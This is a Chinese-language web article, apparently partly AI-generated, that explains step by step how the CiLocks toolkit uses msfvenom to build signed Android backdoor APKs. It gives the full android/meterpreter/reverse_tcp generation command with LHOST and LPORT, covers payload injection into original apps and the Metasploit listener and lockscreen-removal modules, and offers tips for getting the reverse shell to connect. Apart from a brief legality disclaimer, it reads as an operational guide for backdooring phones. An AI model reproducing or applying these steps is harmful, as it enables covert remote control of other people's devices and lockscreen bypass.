拓冰建站拓冰建站
首页 / 资讯中心 / 正文

CiLocks msfvenom参数完全解析:LHOST、LPORT与reverse_tcp一次看懂

CiLocks msfvenom参数完全解析LHOST、LPORT与reverse_tcp一次看懂【免费下载链接】CiLocksCrack Interface lockscreen, Metasploit and More Android/IOS Hacking项目地址: https://gitcode.com/GitHub_Trending/ci/CiLocksCiLocks 是一款开源的 Android/iOS 锁屏破解工具箱其中内置了基于msfvenom的后门载荷生成功能。本文以 CiLocks 为例把新手最常问的三个 msfvenom 参数——LHOST、LPORT与reverse_tcp——一次讲透它们各代表什么、怎么填、有哪些坑帮助你 10 分钟看懂 CiLocks 的 Metasploit 模块。上图是 CiLocks 的主菜单选项 10 Jump To Metasploit 就是进入 msfvenom 后门生成模块的入口。CiLocks Metasploit 后门生成器菜单速览选择 10 后会进入Metasploit Backdoor Generator子菜单共 4 个选项选项功能底层机制1. Install Application通过 adb 安装并启动指定 APKadb install am start2. Create Payload Backdoor {Msfvenom} Signed用 msfvenom 生成已签名的后门 APKmsfvenom keytool jarsigner zipalign3. Run Metasploit自动开启监听等待载荷回连exploit/multi/handler 等模块4. Inject Payload In Original Application向原始 APK 中注入 msfvenom 载荷msfvenom -x 注入对应实现逻辑集中在主脚本的选项 10 分支中cilocks。LHOST 参数解析载荷回连的大本营IPLHOST Local Host本地主机填你本机的 IP 地址目标设备安装 APK 后会主动向 LHOST 发起连接而不是你连它如何获取终端执行ip addr | grep state UPCiLocks 启动时也会自动检测并打印 Your IP Addresscilocks⚠️ 必须填目标能访问到的局域网 IP填 127.0.0.1 对目标没有意义LPORT 参数解析本机监听的端口号LPORT Local Port本地端口即你等待载荷回连的端口生成 APK 时填的 LPORT与后面运行 Metasploit 监听器时必须完全一致Metasploit 默认常用 4444只要端口未被其他程序占用即可换了 LPORT 就必须重新生成APK否则永远等不到回连reverse_tcp 解析为什么用反向连接reverse_tcp反向 TCP由被控端手机主动拨号到攻击机而非攻击机主动外联适合目标位于 NAT、路由器之后的场景无需端口映射这也是移动端渗透的首选CiLocks 中 Android 使用android/meterpreter/reverse_tcpiOS 使用osx/armle/execute/reverse_tcpcilocksCiLocks 选项 2 的核心生成命令主脚本第 377 行msfvenom -p android/meterpreter/reverse_tcp lhostLHOST lportLPORT R loli.apk-p指定 payload载荷类型lhost / lport即上文解析的两个关键 msfvenom 参数R将编码后的载荷重定向输出为 APK 文件生成后 CiLocks 还会自动完成签名与对齐keytool 生成 keystore → jarsigner 签名 → zipalign 对齐最终产出可正常安装的签名 APKcilocks。运行 Metasploit 监听LHOST 与 LPORT 的二次确认选择选项 3 Run Metasploit 时会再次询问 LHOST 和 LPORT并根据监听器选择在新终端窗口自动组装 msfconsole 命令监听器msfconsole 模块用途1. Multi Handler {Default}exploit/multi/handler通用载荷回连处理2. Remove Lockpost/android/manage/remove_lock载荷上线后移除锁屏3. Remove Lock {Root}post/android/manage/remove_lock_root已 Root 设备移除锁屏4. Safari Jit {iOS 7.1.2}exploit/apple_ios/browser/safari_jit旧版 iOS Safari JIT 利用组装逻辑位于 cilocks会自动set PAYLOAD、set lhost、set lport后执行exploit;。新手常见 4 个坑一次避完LHOST / LPORT 两端不一致生成 APK 与监听器的参数必须一一对应这是收不到回连的首要原因LHOST 填错地址填目标所在网络的局域网 IP不要填公网 IP 或 127.0.0.1端口被占用监听器报 Address already in use 时换一个 LPORT 并重新生成载荷防火墙拦截确认本机防火墙已放行 LPORT且两端网络互通环境准备与相关目录安装 Metasploitsudo apt install msfconsole -yCiLocks 启动时由 data/config 自动检测是否已安装并提示生成的后门 APK 统一保存在 backdoor/ 目录完整安装步骤与依赖清单见 README.md其他模块PIN 暴力破解字典 4digit.txt、6digit.txtAntiGuard 锁屏绕过应用源码 unlock.java⚠️注意CiLocks 仅供安全学习与授权测试使用请勿用于任何非法活动README 明确声明 Please Dont Use for illegal Activity。【免费下载链接】CiLocksCrack Interface lockscreen, Metasploit and More Android/IOS Hacking项目地址: https://gitcode.com/GitHub_Trending/ci/CiLocks创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
分享:

看完干货,该让你的企业上线了

免费需求沟通 · 48 小时内出具建站方案 · 河南本地可上门